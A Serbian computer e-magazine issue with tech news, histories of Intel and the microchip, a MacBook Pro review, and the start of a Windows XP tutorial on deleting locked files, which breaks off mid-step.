Net Majstor E-magazin Broj 3
January 5, 2017 | Author: ZEROF | Category: N/A
Short Description
Download Net Majstor E-magazin Broj 3...
Description
ti
Vesti iz sveta racunara
Imate ideju da pomognete svetu? Evo vam 10 miliona $ Kompanija „Gugl” će dodeliti pet puta po dva miliona dolara za ideje koje mogu da pomognu što većem broju ljudi na Zemlji... Ako imate ideju kako da svet učinite boljim mestom za život za što više ljudi, kompanija „Gugl” želi da je čuje od vas - i za to je spremna da plati do 10 miliona dolara, sve da bi učinila da se vaša zamisao realizuje. Internet gigant je lansirao ovu inicijativu u sklopu proslave 10 godina svog postojanja. BOLJITAK - Projekat koji je nazvan „Deset na stoti” podrazumeva dodeljivanje pet puta po dva miliona dolara za ideje koje mogu da pomognu što većem broju ljudi na Zemlji. - Te ideje mogu da budu velike ili male, tehnhološki ili briljantne po svojoj jednostavnosti - ali moraju da naprave utisak. Znamo da postoje genijalne ideje kojima je potrebna novčana podrška - objavljeno je saopštenje „Gugla” u sredu ujutru na sajtu Si-En-Ena. Ideje je moguće poslati na bilo kom od 25 jezika koji podržava pretraživač „Gugl” (i na srpskom), na internet adresu www.project10tothe100.com, sve do 20. oktobra ove godine. Svi koji se odluče da pošalju ideju, svoju zamisao moraju da opišu jasno i da odgovore na šest pitanja, od kojih je jedno: Ako vaša ideja bude realizovana, ko će imati koristi od toga i koliko? Zaposleni u „Guglu” će do 27. januara 2009. odlučiti kojih 100 ideja zaslužuju da uđu u finalno takmičenje. Od tog dana do 2. februara svi internet korisnici će moći onlajn da glasaju za ideju koja je na njih ostavila najveći utisak - oni će izabrati 20 najboljih. Još neimenovane sudije će od tih 20 izabrati pet pobednika, koji će za svoje projekte u maju iduće godine dobiti po dva miliona dolara. - Ne želimo da ih ograničavamo na bilo koji način. Žrelimo različite ideje. Mislimo da se genijalne ideje mogu pojaviti s bilo kojeg mesta - kaže Betani Pul, marketing menadžer „Gugla”, na spekulacije da će najbolje proći ideje koje bi se zasnivale na obezbeđenju smeštaja za beskućnike i hrane za gladne.
Google Android uskoro među nama
Najveći svetski Internet pretraživač Google, pustiće 23. septembra u prodaju svoj prvi mobilni telefon pod operativnim sistemom otvorenog koda, pod nazivom Android, preko američke filijale nemačkog operatera TMobile, objavljeno je u Vašingtonu. Taj telefon će se pojaviti u širokoj potrošnji samo 10 meseci nakon što ga je Google zvanično predstavio. Telefon će nositi naziv Dream ili G1. Sada je samo pitanje da li će se otvorena strategija kompanije Google, sa svojim operativnim sistemom
otvorenog koda, isplatiti u konkurenciji čuvenog multifunkcionalnog telefona iPhone američke kompanije Apple. Pogledajte snimak » Google bi mogao da zaseni Apple pre svega činjenicom da je Android zasnovan na sistemu otvorenog koda, što znači da svi korisnici imaju priliku da unapređuju softverska rešenja koja Android nudi i da ih konstantno poboljšavaju.
Potvrđena pretpostavka o sve većoj Linux zastupljenosti Anketom, koju smo sproveli na našem sajtu, kao i snimanjem tržišta, onog dela poslovnih subjekata koji posluju s našom kompanijom, došlo se do zaključka da je svaki treći računar u preduzećima sa operativnim sistemom Linux. Ovo nije empirijski podatak, već podatak dobijen prebrojavanjem "Linux" instalacija. Takođe je pokazala, pomenuta anketa, da je 75% anketiranih korisnika spremno da koristi Linux operativni sistem ( 30% od tog broja je iskazalo tu spremnost nakon pohađanja određene obuke). Ovo sve navodi na zaključak da je od početka bila ispravna orijentacija naše kompanije na razvoju multiplatformskog softvera. To će u perspektivi značiti da će se poslovni softver izvršavati na raznovrsnim platformama, (WIndows, Linux, Unix, Mac OS...) i da će korisnici imati utisak da rade na jednoj te istoj platformi. Ovaj utisak se pojačava i time što zajednica slobodnog softvera poboljšava sve više i više "office" softver, kao što je openOffice.org, pa on skoro u potpunosti može istisnuti Microsoft Office, bar u najvećem broju slučajeva. Mišljenja smo da će se u budućnosti postotak Windows i Linux distribucija često menjati, čas u korist jednog ili drugog operativnog sistema. Najpre će se dogoditi opstanak kritične mase Windows operativnih sistema, najviše zbog aplikacija, kao što je Microsoft Office, aplikacije za e-banking i specijalnog softvera koji radi samo na ovoj platformi. Erozivnu prazninu će popunjavati razne distribucije Linux operativnih sistema kao i Mac OS-a. Posebno će se primetiti osetno povećanje tržišta Mac OS-a, zbog trenutne agresivne kampanje Apple-a na prodaji svojih računara na našem tržištu. Preduzeća koja imaju sredstava i koja drže do svog nivoa, sve više će nabavljati Apple računare sa preinstaliranim Mac OS-om, kao i druge kompanije u svetu, što će rezultovati primetmi udelom ove platforme na tržištu. Uz pomoć BusinessWare ERP softvera, koji je jedan od ređih multiplatformskih softvera, multiplatfomnost će dobijati sve više na značaju, jer se time štedi novac, postaje se konkurentan u odnosu na "monoplatformske" poslovne softvere, olakšava se uvođenje (deployment), nije potrebna doobuka za rad na drugim platformama (softver se ponaša identično svuda) i td.
Četrdeset godina Intela Intel, danas jednu od najpoznatijih svetskih kompanija, pre četrdeset godina osnovali su Gordon Mur, fizičar i hemičar po kome je dobio naziv poznati Murov zakon, i Robert Nojs, fizičar koji je radio na izumu integrisanog kola. Obojica, uostalom kao i osnivači kompanije AMD - Intelovog najvećeg konkurenta, pre toga su radili na Fairchild Semiconductor institutu. Kasnije, kompaniji se pridružio i poznati akademik Endi Gruv. Prvobitno, naziv kompanije bio je Moore Noyce, po njihovim prezimenima, ali kako je suviše podsećalo na more noise (više buke) ubrzo su odustali od tog imena, jer im asocijacija na buku ne bi donela mnogo koristi u prodaji hardvera, i odlučili se za Integrated Electronics, skraćeno Intel. Mali problem nastao je već na početku, jer je pod tim nazivom bio registrovan lanac hotela, pa su najpre morali da otkupe prava na ovo ime, nakon čega zvanična istorija i neverovatni uspeh Intela počinje. Godinu dana nakon osnivanja, prvi proizvod ove kompanije pojavio se na tržištu. Bila je to 3101 Schottky bipolarna random access memorija, a tada nastaje i njihov prepoznatljiv logo "dropped e". Sedište u Santa Klari u Kaliforniji osnovano je 1970. godine, a već sledeće predstavljen je prvi mikroprocesor Intel 4004, koji je ujedno bio i prvi ikada napravljen procesor na jednom čipu. Iako je za današnje poimanje to bio procesor siromašnih mogućnosti, u to vreme, bio je revolucionaran. Te godine, kompanija Intel zaradila je 6,8 miliona dolara. Početak x86 arhitekture 1974. godine prvi pravi mikroprocesor opšte namene - Intel 8080 pojavio se na tržištu i ubrzo je našao široku primenu u svakodnevnom životu. Od Intelovog procesora 8086, koji se pojavio četiri godine kasnije, potiče ime arhitekture x86, pa su se kasnije za nove procesore dodavani samo brojevi ispred (80286, 80386, 80486), sve dok se početkom 1993. godine kompanija nije odlučila da za novi procesor uzme ime Pentium, marketinško ime koje je trebalo da proizvode učini bližim javnosti, što je, kako se vremenom ispostavilo, bio dobar potez. Početkom poslednje decenije dvadesetog veka, počela je i kampanja sa prepoznatljivim sloganom Intel Inside, koji je osmislio Denis Karter, a kojim se Intel predstavio kao brend namenjem običnim domaćinstvima. Pored daleko najpoznatijeg Pentiuma, Intel izbacije i praktično oslabljenu verziju Pentium procesora - Celeron. U međuvremenu, kompanija je sve više rasla. Osnivači dobijaju priznanja za doprinose nauci, osnovana je Intel fondacija i vremenom, kako kompjuteri postaju dostupni široj populaciji, Intel postaje industrijski lider. Jedan od bitnih događaja u istoriji ove kompanije čini i partnerstvo sa Appleom, odnosno prelazak Macintosh računara sa Power PC na Intelovu x86 arhitekturu, a prvi takav računar pojavio se na tržištu januara 2006. godine. Iste godine umesto slogana Intel inside, promoviše se novi - Leap ahead. Period procesora za više jezgara započinje 2006. godine, a Intel to čini procesorima Intel Xeon 5300 i Intel Core 2 Extreme. Dve godine kasnije stiže novina u vidu Intel Atom procesora, grupe procesora koji štede energiju, namenjenih mobilnim internet uređajima, notebook računarima i nettop uređajima. Intel danas
Danas Intel posluje u 50 zemalja sa oko 300 kancelarija širom sveta. Iako je na listi 100 najmoćnijih brendova na svetu (Brandz Ranking 2007, Millward Brown Optimor) kompanija zabeležila značajan pad, sa 15. na 25. mesto pomenute, ona i dalje važi za jednu od najznačajnijih kompanija iz ove oblasti u dosadašnjoj istoriji. Intel zapošljava oko 85.000 ljudi, a politika zaposlenih nije tipična za kompaniju iz "Silikonske doline", i nije ni približno neformalna i opuštena kao, na primer, u Googlu ili Sunu. Zaposleni koji određeno vreme ne ispunjavaju postavljene zahteve, ne ostaju dugo u kompaniji. Sa druge strane, radi širenja duha egalitarizma, nijedan zaposleni nema svoju kancelariju, pa čak ni CEO - Pol Otelini. Intel je dobitnik priznanja od strane Working Mother magazina, kao jedna od sto najboljih kompanija za zaposlene majke, a pored toga politika firme promoviše i jednakost bez obzira na versko ili seksualno opredeljenje svojih zaposlenih. U čast 40. godišnjice, CEO kompanije, Otelini je pozvao svoje zaposlene da učestvuju u kolektivnoj donaciji u vidu volontiranja od milion sati i time pomognu razvoju lokalnih zajednica širom sveta, čime kompanija želi da posvedoči o svojoj korporativnoj društvenoj odgovornosti.
Upotreba IKT u Srbiji Republički zavod za statistiku Srbije sproveo je, po treći put, istraživanje o upotrebi informacionokomunikacionih tehnologija u domaćinstvima i preduzećima. Jovana Milićević Istraživanje sprovedeno po EUROSTAT metodologiji, obuhvatilo je 2000 domaćinstava i 2000 pojedinaca, starosti od 16 do 74 godine, a uzorak je podeljen na područja centralne Srbije, Beograda i Vojvodine. Istraživanje nije sprovedeno na Kosovu. Telefonskim putem, kako se ovo istraživanje sprovodilo, došlo se do podataka da u Republici Srbiji 40,8% domaćinstava poseduje računar, što je povećanje od 6,8% u odnosu na 2007. i čak 14,3% u odnosu na 2006. godinu. Što se razlika u brojkama vezano za tip naselja tiče, urbani deo prednjači sa 47,5%, dok u ruralnim naseljima samo 31,2% domaćinstava poseduje računar, uz bitnu napomenu da je ta razlika smanjena u odnosu na 2007. godinu. Razlike su značajne i po regionima, a zastupljenost je najveća u Beogradu, čak 53,1%, zatim u Vojvodini 41,5% i najmanja u centralnoj Srbiji 34,8%. Što se pristupa internetu tiče, 33,2% domaćinstava u Srbiji poseduje internet priključak, pri čemu i dalje najviše njih koristi modemsku konekciju (51,1%), ali se beleži i znatan porast korišćenja širokopojasne (broadband) konekcije (15,5% ispitanika), pri čemu najveći rast u odnosu na prethodnu godinu beleži ADSL konekcija, sa 12,1% na čak 24,4%. Zavisno od visine mesečnih prihoda, internet priključak većinom poseduju domaćinstva kod kojih taj prihod prelazi 600 evra, a kod onih sa prihodom do 300 evra taj procenat iznosi svega 14,6. Kada govorimo o pojedincima, za 4,3% povećao se broj lica koja koriste računar u odnosu na prethodnu godinu, a udeo korisnika prema nivou obrazovanja pokazuje da je 76,8% lica sa višim i visokim obrazovanje koristilo računar u poslednja tri meseca, 57,6% sa srednjim i 24,9% sa nižim obrazovanjem. Broj svakodnevnih korisnika računara povećao se za više od 400.000, i iznosi 1,9 miliona, a internet svakog dana koristi 1,25 miliona stanovnika. Kao najčešći razlozi za nekorišćenje interneta navedeni su nedostatak vremena (49,4%), spora veza (33,3%) i visoke cene bržih konekcija (20,6%).
Anketa je pokazala i da čak 86,3% lica koja koriste internet nikada nije kupovala ili poručivala robu i usluge ovim putem, a od onih koji to čine, 32% naručuje knjige i magazine, 30,4% računarski softver a 26,3% je putem interneta kupovalo elektronsku opremu. Što se preduzeća tiče, istraživanje je obuhvatilo 1096 pravnih lica sa najmanje 10 zaposlenih iz raznih privrednih delatnosti, a rezultati ispitanog uzorka govore da čak 97,7% preduzeća koristi računar. Njih 91,5% ima pristup internetu, gde je, za razliku od domaćinstava, na prvom mestu neki oblik DSL konekcije sa 57% i rastom od čak 26,4% u odnosu na 2007. godinu, dok modemska konekcija beleži smanjenje od 14,1%. ERP sistem (Enterprice Resource Planning sistem) tokom januara 2008. godine koristilo je svega 10% preduzeća i to najčešće banke i osiguravajuća društva, a iznenadio je podatak da je broj preduzeća koji koriste ovaj sistem opao u odnosu na prethodnu godinu za čak 6,4%. Interesantan je i podatak da je čak 17,2% preduzeća koristilo GNU/Linux operativni sistem tokom 2008. godine, što je povećanje od 2,9% u odnosu na prethodnu. Značajan rast zabeležen je u broju onih preduzeća koja imaju svoj web sajt: 68,9%: u odnosu na 61,8% prethodne i 52,9% 2006. godine. Regionalne razlike su i ovde izražene, pa tako 77,4% beogradskih preduzeća poseduje web sajt, u Vojvodini to iznosi 67,9%, dok ga u centralnoj Srbiji ima 61% preduzeća. Procenti koji govore o poručivanju putem interneta su i dalje niski, pa je tako samo 17% preduzeća koje imaju internet priključak primalo porudžbine putem interneta, a procenat onih koji su naručivali proizvode i usluge ovim putem iznosi 20,8%. Na pitanje o značaju informaciono-komunikacionih tehnologija, 22,5% preduzeća smatra da je njihova upotreba doprinela reorganizaciji i pojednostavljivanju radnog procesa, 10,7% smatra da je doprinela razvoju novih usluga, a 9,8% vezuje upotrebu ovih tehnologija za veću zaradu preduzeća. Ovim istraživanjem, Republički zavod za statistiku osim pružanja uvida u trenutno stanje želi i da pruži osnove za dalje planiranje razvoja informacionih tehnologija u našoj zemlji. Kompletno istraživanje možete preuzeti sa sajta zavoda u PDF formatu.
Mikročip: 50. rođendan Kako je jedan propušteni godišnji odmor pre pedeset godina uticao na to da vi imate mogućnost da čitate ovaj tekst danas? Piše: Srđan Jovanović
Letnji meseci te davne 1958. godine su u laboratorijama Teksas instrumentsa proticali sporo. Za mladog inženjera Džeka Kilbija (Jack Kilby), koji zbog činjenice da je bio tek zaposlen u pomenutoj kompaniji nije imao prava na godišnji odmor, ti meseci su bili ispunjeni mirom i tišinom, a to je bilo sve što je njemu u tom trenutku trebalo. To i laboratorija u kojoj je uporno radio na rešenju jednog od tadašnjih najvećih problema i kočnice daljeg razvoja elektronike. Naime, Kilbi je radio na rešavanju problema tzv. „tiranije brojeva“, odnosno pokušavao je da pronađe način da međusobno poveže svaki sa svakim veliki broj tranzistora, osnovnih komponenata elektronskih sistema tog vremena. Dugo vremena pre toga inženjeri su pokušavali da reše taj problem i budući da se sa razvojem ideja za primenu elektronskih sklopova povećavao i broj tranzistora i ostalih komponenata neophodnih za realizaciju tih ideja, potreba za opštim rešenjem povezivanja velikog broja komponenata je bila ogromna.
Najbolja rešenja su često i najjednostavnija Rešenje koje je Kilbi ponudio je bilo više nego jednostavno. Umesto da povezuje tranzistore kao diskretne komponente koje imaju svoje kućište i tri izvoda, Kilbi je tranzistore povezao već u samom poluprovodnuku, osnovnom gradivnom elementu tranzistora. U čemu se sastojala genijalnost Kilbijeve ideje? Ukoliko bi u ruku uzeli tipični tranzistor, primetili bi da on ima plastično ili metalno kućište, najčeće valjkastog oblika i tri izvoda, odnosno žice. Međutim, to su samo delovi tranzistora koji su načinjeni tako velikim kako bi nama bila olakšana njegova upotreba, dok je deo tranzistora koji je najbitniji sakriven duboko unutar njegovog kućišta. Taj deo je načinjen od poluprovodnika i manji je od 0,01 promila čitave komponente. Umesto da tranzistore povezuje u diskretnoj tehnici (sa sve kućištem i žičanim izvodima) Kilbi je rešio da to obavi već u samom poluprovodniku, gde su tranzistori minijaturnih dimenzija. Uvidevši da je i veliki broj ostalih komponenata (diode, otpornici, kondenzatori, itd.) bilo moguće napraviti od istog poluprovodnika, Kilbi je došao na ideju da ih sve poveže na jednom komadu poluprovodnika, unutar jednog kućišta. Ta ideja je bila kamen temeljac razvoja elektronike, a samim tim i čitave nauke i tehnologije i života koji nas okružuje. Kilbi je svoju ideju o monolitnoj (integrisanoj) izradi komponenata predstavio menadžmentu Teksas instrumentsa 12. septembra 1958. tako što je na parčetu germanijuma (jednog od poluprovodnika) žicama povezao jedan tranzistor i nekoliko ostalih komponenata i pred zapanjenim auditorijumom uz pomoć mernih instrumenata dokazao rad takvog elektronskog sklopa. To prvo integrisano elektronsko kolo, približne veličine 10mm x 1,5mm predstavljalo je prvi konstruisani mikročip na svetu. Od tog trenutka broj tranzistora u jednom mikročipu je rastao iz dana u dan, a oblasti primene mikročipova su se nizale jedna za drugom. Godinu dana nakon Kilbijeve prezentacije, Robert N. Nojs (Robert N. Noyce), koosnivač Intela i Feirčajld semikondaktora podneo je patent Poluprovodničke planarne integrisane strukture, a godine 1960. u Feirčajldu je proizveden prvi mikročip. Doprinos Nojsa je bila u tome što je umesto germanijuma, za osnovu (supstrat) tranzistora iskoristio silicijum, drugi poluprovodnik za koji se kasnije Kilbi ispostavilo da zbog boljih karakteristika predstavlja povoljnije rešenje, kao i u tome što je umesto žica, za međusobno povezivanje komponenata izrađenih u silicijumu iskoristio sam silicijum. To je u mnogome poboljšalo kvalitet izrađenih integrisanih kola pruživši mogućnost daljeg povećanja gustine pakovanja.
Kilbi i Nojs su za svoje doprinose masovnoj proizvodnji mikročipova nagrađeni američkom Nacionalnom medaljom za nauku. Pored toga, Kilbi je 2000. godine nagrađen i Nobelovom nagradom za fiziku, a sam Kilbi je na svečanosti dodele nagrade iskoristio priliku i da ukaže na veliki doprinos Roberta Nojsa, koji je tada već bio pokojni.
Razvojni put mikročipa Danas je teško zamisliti život bez mikročipova. Ima ih u svim oblastima naših života: u komunikaciji, medicini, transportu, proizvodnji i prodaji, zabavi; teško da postoji jedna oblast naših života u kojima raznovrsna mogućnost upotrebe mikročipova ne dolazi do izražaja. Ista je stvar i sa naukom. Zahvaljujući mikročipu i napretku tehnologije, uznapredovale su i mnoge nauke, kao i naš pogled na život koji nas okružuje. Mnoge velike kompanije danas se utrkuju u prozvodnji i primeni mikročipova. A nije uvek bilo tako. Uprkos očiglednim prednostima mikročipa u odnosu na diskretnu tehnologiju (manja cena izrade, bolje performanse, izuzetno manja veličina), bilo je potrebno da prođe određeno vreme pre nego što im je industrija pronašla praktičnu primenu. Kao što to obično i biva sa novim tehnologijama, prvo su vojska i ostale američke vladine organizacije pokazale interesovanje za upotrebu mikročipova. Godine 1961. Teksas instruments je za potrebe američke avijacije napravio tzv. „Molekularni elektronski kompjuter“, uređaj koji je u praksi demostrirao da je bilo moguće zameniti 8500 tranzistora sa 587 mikročipova. NASA je takođe tih ranih šezdesetih pokazivala zainteresovanost za mikročipove: određeni broj mikročipova je bio ugrađen u Apolov kontrolni računar, kao i u Interplanetarnu sondu za monitoring koja je poslata u svemir davne 1963. Godine 1962. Teksas instruments je potpisao ugovor sa Autonetiks divižn ov Nort American aviejšon za dizajniranje 22 različita mikročipa koji će se kasnije iskoristiti za Minuteman I i Minuteman II raketne navodeće sisteme. Bila je ovo prva upotreba mikročipa u neke vojne svrhe. Do 1965. američka avijacija je istisnula NASA-u sa vodećeg mesta na svetskoj rang listi kupaca mikročipova. Koosnivač Intela Gordon Mur (Gordon Moore) je takođe odigrao važnu ulogu Originalan Kilbijev mikročip u evoluciji mikročipova. U to vreme (1965) još uvek radeći kao direktor u Feirčajldu, Mur je napisao interni rad na temu „Budućnost razvoja integrisane elektronike“, u kome je pokušao da predvidi pravac i tempo razvoja integrisane elektronike u narednih deset godina. Mur je izneo procenu da će broj komponenti po jednom čipu na kraju te godine dostići 65000 i da će se taj broj duplirati svakih dvanaest meseci. Ovakva formulacija razvoja integrisane tehnologije danas je poznata kao Murov zakon i predstavlja osnovu za razvoj računarske industrije u poslednje četiri decenije. Šezdesetih godina prošlog veka kalkulatori su bili robusne mašine veličine današnjih računara, koje su se uključivale u mrežno napajanje, kako bi uz veliku potrošnju električne energije došli do validnih kalkulacija. Mikročipovi su promenili sve to. Nipon kalkulejting mašin korporejšon je 1969. godine poručila od Intela 12 različitih mikročipova, specijalno dizajniranih za potrebe izrade njihovog najnovijeg kalkulatora, Busicom 141PF . Budući da su već uveliko kasnili sa rokom isporuke, tri Intelova inženjera Ted Hof, Federiko Fagin i Sten Mazor predložili su alternativu u dizajnu: izradu familije od četiri mikročipa, od kojih bi jedan mogao biti naknadno programiran za upotrebu u različitim proizvodima. Tako je rođen 4004, prvi mikroprocesor koga je bilo moguće kupiti na slobodnom tržištu. Iako približne veličine od samo 4,5mm sa 3mm, ovaj mikroprocesor je bio u stanju da izvrši isti broj operacija u vremenu kao i njegov daleki prethodnik ENIAC napravljen još 1949, sa jednom razlikom: ENIAC je bio napravljen od 18000 vakuumskih cevi i bio je veličine jedne poveće sobe!
Dalji razvoj, vođen ekonomskim faktorima doveo je sredinom sedamdesetih do pojave LSI (Large Scale Integration) mikročipova sa gustinom pakovanja od desetak hiljada tranzistora po čipu. Čipovi za kalkulatore, razne memorije i prvi mikroprocesori su imali do oko 4000 tranzistora, dok je prava LSI tehnologija osvojena oko 1974., za proizvodnju memorija za računare i mikroprocesore druge generacije. Nakon ovoga je usledio VLSI (Very Large Scale Integration), korak koji traje i dan danas, počevši od nekoliko stotina hiljada tranzistora u ranim osamdestim, preko jednog miliona tranzistora na čipu (1986. u memoriji i 1989. u mikroprocesoru) pa sve do nekoliko milijardi tranzistora (2005. dostignuta jedna milijarda), koliki je red gustine pakovanja današnjih mikroprocesora.
Kuda dalje? Razvoj mikročipova je nezaustavljiv: kako tehnologija napreduje, sve veće gustine pakovanja postaju realnije, što inženjerima pruža mogućnost za realizaciju sve kompleksnijih funkcija unutar jednog čipa. Novi mikročipovi se ugrađuju u uređaje koji pomažu razvoj novih i boljih tehnologija. Sve ovo liči na začaran krug koji kao rezultat ima munjeviti razvoj društva, tzv. informatičku revoluciju.
Tranzistor izrađen u diskretnoj tehnici pod rentgenom
Gledajući u budućnost, u narednih pedesetak godina, ma koliko to bio smeo i često nepromišljen potez (izuzimajući g. Mura i njegov već pomenuti zakon koji i dan danas važi), usled potrebe za još većom brzinom, manjom potrošnjom energije, kao i usled brige o recikliranju i očuvanju životne sredine, dolazimo do zaključka da će se izgled mikročipa u velikoj meri promeniti. Već sada se vodeće svetske kompanije umesto povećanja radnog takta radije odlučuju za povećanje broja jezgara unutar mikroprocesora.
Takođe, pokušavaju da promene koncept prenošenja informacija unutar mikročipa sa žičanog prenosa na prenos putem svetlosti. Potrebe za sve većom količinom podataka za čuvanje otvaraju pitanje organizacije memorije u kule, tj. u visinu, za razliku od današnje upotrebe planarnih struktura, kao i upotrebu organskih materija za smeštanje memorije. Bilo kako bilo, proslava jednog veka postojanja mikročipa verovatno će nam doneti istu količinu uzbuđenja i divljenja, bilo da posmatramo njegovu evoluciju ili sagledavamo mogućnosti njegovog daljeg razvoja.
Stigao je novi MacBook Pro Kompanija Apple poznata je po kvalitetnom softveru i hardveru, a do nas je stigao novi model njihovog MacBook Pro računara. Nebojša Rašković Kada govorimo o kompaniji Apple ono što nam uvek prvo padne na pamet jeste vrhunski hardver upakovan u elegantno dizajnersko rešenje koje privlači apsolutno svakog ko ga ugleda. Za ovog proizvođača je između ostalog karakteristično i to da sve svoje grupe proizvoda osvežava na godišnjem nivou, što je slučaj i sa MacBook Pro familijom laptop računara koja je polovinom leta dobila svoje nove predstavnike. Mi smo imali prilike da se bolje upoznamo sa trenutno najjačamo petnaesticom i nećemo biti nimalo skromni ako kažemo da se možda radi i o najboljem notebook računaru na svetu. Šta je to konkretno po čemu se MacBook Pro izdvaja od ostalih laptop mašina... Prvi Apple računari bili su zasnovani na seriji procesora kompanije Motorola (Motorola 680x0), da bi nakon toga bio predstavljen i Mac sa PowerPC procesorom. Ove procesore proizvodili su Freescale i IBM i na njima su sve Apple mašine veomo dobro funkcionisale. Do pre samo godinu i po dana
Freescale PowerPC G4 procesori bili su ugrađivani samo u prenosne računare, dok je IBM proizvodio moćnije G5 procesore koji su bili predviđeni za Appleove desktop mašine. Ipak, usled nemogućnosti daljeg napredovanja po pitanju brzine, odnosno radnog takta, što se posebno odnosilo na G4 modele namenjene prenosnim računarima, ali i prevelikog zagrevanja IBM PowerPC G5 procesora, Apple je rešio da se okrene novoj Intel Core arhitekturi. Mnogi su u početku mislili da će prelaskom na Intel x86 procesore Mac nestati, što se naravno nije dogodilo. Za one koji ne znaju, osnovu Mac platforme čini Mac OS X, a svi novi Mac računari zasnovani na Intel procesorima i dalje koriste ovaj operativni sistem. Ono što je kod aktuelnih računara baziranih na Intel procesorima evidentno jeste da su sada nesumnjivo brži, kao i da nude mogućnost instaliranja Windows XP ili Vista operativnih sistema, što ih je automatski učinilo još atraktivnijim za krajnje kupce. Potrošači time dobijaju računar koji radi i sa Mac OS X platformom (koja slovi za jednu od najnaprednijih i najbezbednijih) i sa Windows operativnim sistemima. Dizajn i performanse
Minimalistički sadržaj je nešto na šta smo već navikli kada su Apple proizvodi u pitanju, pa smo pored notebooka u prelepoj crnoj kutiji našli još samo par kratkih brošura o proizvodu, kabl sa adapterom za napajanje i dva instalaciona diska. Po postavljanju računara na radni sto odmah se uočava besprekorna izrada koja, po našem mišljenju, za nijansu odskače u poređenju sa prethodnom generacijom. Sam laptop je kompletno napravljen od brušenog aluminijuma, čija je površina presvučena posebnim materijalom koji dodatno osigurava računar od ogrebotina i oštećenja. Finiš je sjajan - naprosto ne postoji detalj na koji dizajneri nisu obratili pažnju i to posebno naglašavamo. U vizuelnom segmentu novi MacBook Pro podseća na svoje prethodnike, mada se boljim posmatranjem može uočiti par sitnica koje ga čine posebnim. Naravno, njihova uloga u realnom radu je nikakva - čista estetika. Tastatura na novom Macu je doživela blago unapređenje - tasteri su veliki, imaju plitak hod i osrednji otpor pri kucanju, što se u praksi pokazalo kao jedno od najboljih rešenja za većinu korisnika notebook računara. U suštini za prijatan rad sa tasturom velikim delom je zaslužna nova Apple tehnologija (slična Logitechovoj scissor switch), koja je nastala upravo sa željom da obezbedi što lagodniji rad za MacBook Pro mašinom. Srce testiranog modela čini Intelov Core2 Duo procesor na radnom taktu od 2,5 GHz, a važno je napomenuti da se u aktuelnoj ponudi nalazi i model baziran procesoru od 2,4 GHz koji je dostupan po nešto nižoj ceni. Uskoro se na tržištu očekuje i rešenje sa trenutno najboljim Intelovim Mobile procesorom (2,6 GHz), ali kada će se novi MacBook pojaviti sa njim nije poznato. Dizajneri ovog lepotana su odlučili da implementiraju 2 GB DDR2 memorije (na taktu od 667 MHz), što je sasvim dovoljno i za izvršavanje najsloženijih radnih zadataka, a ako vam je neophodna veća količina ostavljeno je prostora za maksimalno još 2 GB (ukupno 4 GB). Računar koji se nama našao u rukama je došao sa HDD-om kapaciteta 250 GB (jeftiniji model ima za 50 GB manje prostora), potpisanom od strane korporacije Fujitsu, koja važi za jednu od najboljih u njihovoj proizvodnji. Na svim našim testovima ugrađeni čvrsti disk se pokazao sjajno, a posebno nas je iznenadilo koliko je tih u radu.
Za MacBook Pro računare je karakterističan vrhunski displej koji potpisuje par najboljih igrača u ovoj oblasti (jedan od njih je i Elo - tvorac legendarnog touch displeja na iPhoneu i iPod touchu), pa izuzetak nije ni novi model. Rezolucija ugrađenog ekrana je 1440x900 piksela i može reći da po pitanju prikaza slike briljira. Oštrina, detalji i reprodukcija boja dovedeni su gotovo do savršenstva. Veliku odgovornost za sjajan prikaz slike ima i grafički akcelarator (nvidia GeForce 8600M), koji uz odlične brzinske karateristike dolazi sa 512 MB GDDR3 memorije, što će posebno obradovati kupce koji vole da se igraju. Po broju raspoloživih portova novi Mac se ne razlikuje previše od svog prethodnika (model čije srce čini procesor na taktu od 2,3 GHz), što znači da su i dalje su na raspolaganju dva USB 2.0 (jedan sa leve, a drugi sa desne strane), jedan DVI i jedan FireWire 800 port. Pored njih tu su još i mrežni konektor, kao i wireless adapter, koji funkcioniše po novom 802.11n standardu uz podrazumevanu kompatibilnost sa prethodnim. A softver? Sve aktuelne verzije MacBook Pro računara se krajnjim potrošačima isporučuju sa najnovijom verzijom Mac OS X operativnog sistema (radi se o ekstenziji 10.5.xx, poznatijoj pod nazivom Leopard) i velikim brojem osnovnih programa (iTunes, iDVD, iChat, Safari...). Ono što je trenutno aktuelno, jeste da se pojavio veliki broj aplikacija za Leoparda, između ostalog i Microsoft Office paket. Ono što moramo naglasiti jeste da sav softver koji dolazi uz operativni sistem funkcioniše odlično i radu sa njim nismo primetili nikakve znakove bagovitosti. MacBook Pro je u ovom trenutku jedan od najboljih notbookova na svetu, kako po pitanju hardvesrke konstrukcije, tako i u pogledu softverskih rešenja na kojima je bazirana. Na žalost, ni on nije baš bez mana prednji deo se previše greje, pa je neophodno pazariti neki dobar laptop ventilator (npr. Cooler Master Notepal Infinite) kako bi se adekvatno rashladio kod dugotrajne dnevne upotrebe. Isto tako, njegova cena je za naše uslove previsoka (najslabiji model košta skoro 2.000 evra), što je opet veoma bitan faktor u omasovljavanju Apple rešenja kod domaćih potrošača. U svakom slučaju, kada se saberu ostvareni rezultati i podvuče crte može se dodati i to da je Apple sam sebi postavio domaći zadatak kada su upitanju buduća MacBook Pro rešenja za koja verujemo da će biti podjednako atraktivna kao i aktuelna.
Tutoriali
Kako ukloniti fajl? Verovatno ste se ne jednom našli u situaciji da neki fajl ne možete obrisati. Rešenje postoji, a na vama je da odlučite da sami to uradite ili poverenje poverite nekom programu. Ana Labović Više puta kad želite da uklonite neki fajl i da dolazi do poruke o grešci da jednostavno ne može biti obrisan sa računara. Neke od poruka koje se tada pojavljuju su: "Cannot delete file: Access is denied" ili "Make sure the disk is not full or write-protected and that the file is not currently in use". Postoji par načina na koje možete obrisati ove fajlove na Windows XP operativnom sistemu, kao i nekoliko besplatnih aplikacija koje mogu ovo uraditi za vas. Ukoliko želite da ovo ručno uradite i da se uverite da su fajlovi stvarno obrisani trebate da prođete kroz sledeće korake: 1. Idite na Start, Search, All Files and Folders i unesite ime fajla za koji je operativni sistem prijavio da ne može da se obriše. 2. Kada je fajl lociran, desnim klikom na njega odaberite properties i zabeležite putanju na kojoj se nalazi. 3. Zatim odaberite Start, Run upišite cmd i pritisnite enter kako bi startovali komandni prompt i ostavite ovaj prozor otvoren. 4. U run dijalogu sada upišite taskmgr.exe i pritisnite enter da bi startovali Task Manager. Idite na karticu Processes, klinite na proces explorer.exe i kliknite na End Process dugme. 5. Sada se vratite u prozor komandnog prompta da biste obrisali fajl. Iskoristite zapisanu putanju do fajla i komandu del kako biste ga obrisali. Npr. del C:\Program Files\imefajla.exe 6. Vratite se u 